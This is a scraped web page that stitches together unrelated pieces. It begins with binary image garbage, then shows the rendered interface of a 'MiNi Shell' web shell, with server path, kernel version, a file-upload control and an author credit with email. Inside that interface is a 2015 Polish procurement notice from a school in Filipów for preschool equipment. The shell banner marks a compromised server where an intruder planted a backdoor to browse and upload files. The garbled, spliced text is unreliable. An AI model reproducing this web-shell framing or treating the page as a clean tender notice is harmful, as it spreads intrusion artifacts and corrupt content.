JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150318/59390-N-2015.html

<p class="kh_header"><b>Filipów: Dostawa wyposażenia na potrzeby 
projektu pt. Przedszkole jutra  współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 59390 - 2015; data zamieszczenia: 18.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Filipowie , ul. M. Konopnickiej 6, 16-424 Filipów, woj. podlaskie, tel. 087 5696029, faks 087 5696002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zsfilipow.biposwiata.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia na potrzeby 
projektu pt. Przedszkole jutra  współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Opis przedmiotu zamówienia:
	
1.	Przedmiotem zamówienia jest dostawa i montaż wyposażenia w ramach projektu pt. Przedszkole jutra współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego. 
2.	Zamówienie odejmuje dostawę i montaż wyposażenia w oddziałach przedszkolnych.  Składa się 6 zadań (części):
1)	Część 1 - dostawa i montaż wyposażenia placu zabaw
W ramach zadania zostanie doposażony istniejący plac zabaw zlokalizowany przy Zespole Szkół w Filipowie w zestaw zabawowy i ściankę wspinaczkową.  Wszystkie montowane na placu zabaw urządzenia powinny posiadać odpowiednie atesty lub certyfikaty zgodne 
z Rozporządzeniem Ministra Edukacji i Sportu z dnia 31 grudnia 2002 roku (Dz.U. z 2003 r., nr 6, poz. 69) oraz być zgodne z normą PN-EN 1176:2009. Załączone do SIWZ przykładowe zdjęcia urządzeń zabawowych oraz szczegółowe opisy mają na celu zobrazowanie wymagań Zamawiającego, co do funkcji zabawowych i rodzaju urządzeń parametrów technicznych zastosowanych materiałów. Wskazane wytyczne, wymiary, parametry należy traktować jako minimalne. Prezentowane zdjęcia nie sugerują producenta, a jedynie służą zobrazowaniu wymagań Zamawiającego można zastosować produkty dowolnego producenta lub dostawcy o parametrach równoważnych lub lepszych. Każde urządzenie montowane na placu zabaw należy wyposażyć w tabliczkę informacyjną dotyczącą bezpiecznego sposobu użytkowania. Wszystkie dostarczone urządzenia muszą posiadać  odpowiednie atesty, certyfikaty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem. Wszystkie materiały użyte do wykonania robót muszą posiadać aktualne polskie aprobaty techniczne lub odpowiadać Polskim Normom. Wykonawca ma obowiązek dostarczyć Zamawiającemu wszelkich certyfikatów, atestów i innych dokumentów dopuszczających urządzenia do użytkowania przed podpisaniem protokołu odbioru. Wymagany okres gwarancji 24 miesięcy od dnia odbioru. Wykonawca ma obowiązek dostarczenia urządzeń oraz ich montażu na istniejącym placu zabaw zgonie ze sztuką budowlaną. 
2)	Część 2 - dostawa wyposażenia do kuchni
Wyposażenie dostarczone będzie do stołówki szkolnej. Zamawiający wymaga aby Wykonawca dokonał montażu stołu z basenem we wskazanym przez Zamawiającego miejscu oraz przeszkolił pracowników w zakresie użytkowania i konserwacji. Cały oferowany asortyment musi być fabrycznie nowy (nie pochodzący  z ekspozycji i wystaw), wysokiej jakości, spełniać wymagane polskim prawem normy, spełniać wymogi Sanepidu, BHP, przeciwpożarowe, posiadać dokumenty dopuszczające do obrotu na terenie Rzeczpospolitej Polskiej, być sprawne technicznie i spełniać warunki techniczne i gwarancji. Wszystkie urządzenia i sprzęt, meble, naczynia kuchenne (blachy, sztućce) muszą być wykonane zgodnie z wymogami stawianymi przez przemysł gastronomiczny oraz właściwe instytucje powołane do sprawowania nadzoru nad warunkami sanitarno-epidemiologicznymi w obiektach zbiorowego żywieni, spełniać wymagania GHP (Dobrej Praktyki Higienicznej) i systemu HACCP oraz posiadać niezbędne świadectwa, certyfikaty i atesty, w tym deklarację zgodności CE. 
Wykonawca wraz z urządzeniem gastronomicznym dostarczy ponadto opis techniczny urządzenia, warunki eksploatacji, certyfikaty, aprobaty techniczne, deklaracje zgodności, świadectwa bezpieczeństwa itp. - o ile są wymagane przepisami prawa.
3)	Część 3 - dostawa i montaż rolet okiennych
Wykonawca musi dokonać pomiaru okien oraz zamontować rolety okienne w terminie uzgodnionym z Zamawiającym.


4)	Część 4 - dostawa i montaż wyposażenia szatni i innych pomieszczeń gospodarczych
Wykonawca ma obowiązek dokonania montażu mebli.
5)	Część 5 - dostawa wyposażenia zapewniającego bezpieczne warunki opieki nad dziećmi
6)	Część 6 - dostawa sprzętu ICT, audiowizualnego, tablic interaktywnych 
z oprogramowaniem i kserokopiarki
Każdy dostarczony sprzęt winien posiadać deklarację zgodności CE oraz odpowiadać normom europejskim i krajowym i być zgodny z. Wykonawca na etapie składania ofert poprzez złożenie podpisu na formularzu ofertowym oświadczy Zamawiającemu, iż cały zaoferowany asortyment jest zgodny z Dyrektywą oraz oznakowany znakiem CE. W terminie 6 miesięcy od daty zrealizowania dostawy Zamawiający może zażądać od Wykonawcy dostarczenia Deklaracji Zgodności dla każdego z dostarczanych produktów. Wykonawca będzie zobowiązany do dostarczenia wymaganego dokumentu. W przypadku nie dostarczenia Deklaracji dostarczony towar zostanie na koszt Wykonawcy wymieniony na inny o nie gorszych parametrach posiadający Deklarację Zgodności. Cały oferowany asortyment musi być fabrycznie nowy (nie pochodzący  z ekspozycji i wystaw). 
Wykonawca dokona montażu sprzętu elektronicznego (telewizora, projektora oraz tablicy interaktywnej) oraz przeszkoli personel z obsługi tablicy interaktywnej w zakresie podstawowym po uprzednim ustaleniu terminu z Zamawiającym.

3.	Przedmiot zamówienia szczegółowo został opisany w Załącznikach nr 3-8 do
SIWZ - Formularzach cenowych.

4.	Podane w opisie przedmiotu  zamówienia oraz w formularzach cenowych nazwy wyrobów 
i elementów nie mają na celu naruszenia art. 29 i art. 7 ustawy z dnia 29 stycznia 2004 r., Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych Zamawiającego. Zamawiający dopuszcza składanie ofert równoważnych pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych, eksploatacyjnych  i jakościowych nie gorszych od założonych oraz gwarantują taką samą funkcjonalność jak produkty opisane w wyżej wymienionych formularzach cenowych. Uznaje się, że oferta równoważna to taka, która przestawia przedmiot zamówienia o właściwościach funkcjonalnych i jakościowych takich samych lub zbliżonych do tych, które zostały określone w  SIWZ. Przedstawione parametry przedmiotu zamówienia stanowią minimum techniczne i jakościowe oczekiwane przez Zamawiającego. 

5. Wykonawca oferując produkty równoważne jest obowiązany wykazać, że oferowane przez niego przedmiot zamówienia jest o tych samych lub lepszych parametrach jakościowych, technicznych, funkcjonalnych i użytkowych wymienionych w specyfikacji istotnych warunków zamówienia, 
w odniesieniu do przedmiotu zamówienia określonego przez Zamawiającego. Ciężar udowodnienia, że wyrób jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. Na potwierdzenie tego złoży stosowne dokumenty tzn. specyfikacje, opisy produktu - potwierdzające spełnienie wymagań odnośnie wartości parametrów produktów oferowanych jako równoważne lub w sposób wyczerpujący wypełni kolumnę 8 tabeli w Formularzu cenowym, w taki sposób aby Zamawiający miał możliwość porównania produktów równoważnych z opisem przedmiotu zamówienia.


6.	Wykonawca jest odpowiedzialny za całokształt zamówienia, w tym za przebieg oraz terminowe wykonanie, jakość, zgodność z warunkami technicznymi, jakościowymi i obowiązującymi w tym zakresie przepisami prawa. 

7.	Wykonawca ma obowiązek dostarczenia wszelkich certyfikatów, atestów i innych dokumentów niezbędnych do dopuszczenia wyposażenia do użytku wraz z protokołem odbioru o ile są one wymagane przepisami prawa.

8.	Wykonawca musi zapewnić na swój koszt załadunek, transport i rozładunek dostarczonego wyposażenia w pomieszczeniu wskazanym przez Zamawiającego  oraz jego montaż (dotyczy asortymentu, który wymaga montażu). 

9.	Wykonawca udzieli gwarancji na okres wskazany w opisie przedmiotu zamówienia Formularzu cenowym, chyba że producent sprzętu i wyposażenia udzieli gwarancji na dłuższy okres.

10.	Wykonawca zobowiązuje się dostarczyć Zamawiającemu wyłącznie wyroby fabrycznie nowe, wolne od wad,  oryginalnie zapakowane (nie dotyczy wyposażenia placu zabaw, rolet okiennych
i mebli jeżeli będą złożone dostarczone dla Zamawiającego) i odpowiadające normom jakościowym, określonym we właściwych aktach prawnych.

11.	Dostawa wyposażenia:
Część 1,2,3,4,5,6 - miejsce dostawy i montażu: Zespół Szkół w Filipowie, ul. Marii Konopnickiej 6, 16-424 Filipów. Dostawa i montaż wyposażenia nastąpi w godzinach 8:00-14:00 w dni robocze. Wykonawca zobowiązuje się uzgodnić z Zamawiającym termin dostawy i montażu wyposażenia co najmniej z dwudniowym wyprzedzeniem.

12.	Projekt jest współfinansowany przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego,  Program Operacyjny Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszenie nierówności w stopniu upowszechnienia edukacji przedszkolnej.

13.	Kody CPV:
37535200-9 - Wyposażenie placów zabaw
39141000-2 - Meble i wyposażenie kuchni
39711000-9 - Elektryczny sprzęt gospodarstwa domowego do użytku ze środkami spożywczymi
42214000-9 - Piece kuchenne, suszarki do produktów rolnych oraz urządzenia do gotowania lub podgrzewania
39515400-9 - Rolety
39160000-1 - Meble szkolne
35111300-8 - Gaśnice 
33141623-3 - Zestawy pierwszej pomocy
34928472-7 - Oznakowanie
22470000-5 - Instrukcje
30121430-6  - Cyfrowe urządzenia powielające
30213100-6 - Komputery przenośne
30232110-8 - Drukarki laserowe
30233152-1 - Urządzenie do odczytu i lub wypalania uniwersalnych dysków wideo (DVD)
32320000-2 - Sprzęt telewizyjny i audiowizualny
32322000-6  - Urządzenia multimedialne
32324600-6 - Telewizory cyfrowe
38652100-1 - Projektory
38653400-1-  Ekrany projekcyjne
48520000-9 -  Pakiety oprogramowania multimedialnego
48624000-7 - Pakiety oprogramowania dla systemów operacyjnych komputerów osobistych (PC)
48900000-7  - Różne pakiety oprogramowania i systemy komputerowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 39.14.10.00-2, 39.71.10.00-9, 42.21.40.00-9, 39.51.54.00-9, 39.16.00.00-1, 35.00.03.00-8, 33.14.16.23-3, 34.92.84.72-7, 22.47.00.00-5, 30.12.14.30-6, 30.21.31.00-6, 30.23.21.10-8, 32.32.00.00-2, 32.32.20.00-6, 32.32.46.00-6, 38.65.21.00-1, 48.52.00.00-9, 48.90.00.00-7, 30.23.31.52-1, 38.65.34.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje pobierania wadium. Wadium nie pobiera się.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin wykonania zamówienia - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
1)	terminu końcowego wykonania przedmiotu zamówienia w zakresie:
a)	wystąpienia okoliczności niezależnych od Wykonawcy i na uzasadniony wniosek Wykonawcy pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona;
b)	działania siły wyższej;
2)	polepszenia parametrów technicznych dostawy;
3)	przedłużenia okresu gwarancji lub poprawienia jej warunków;
4)	aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obwiązujących przepisów.
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zsfilipow.biposwiata.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Filipowie
ul. Marii Konopnickiej 6, 16-424 Filipów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2015 godzina 09:00, miejsce: Zespół Szkół w Filipowie
ul. Marii Konopnickiej 6, 16-424 Filipów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Przedszkole jutra współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com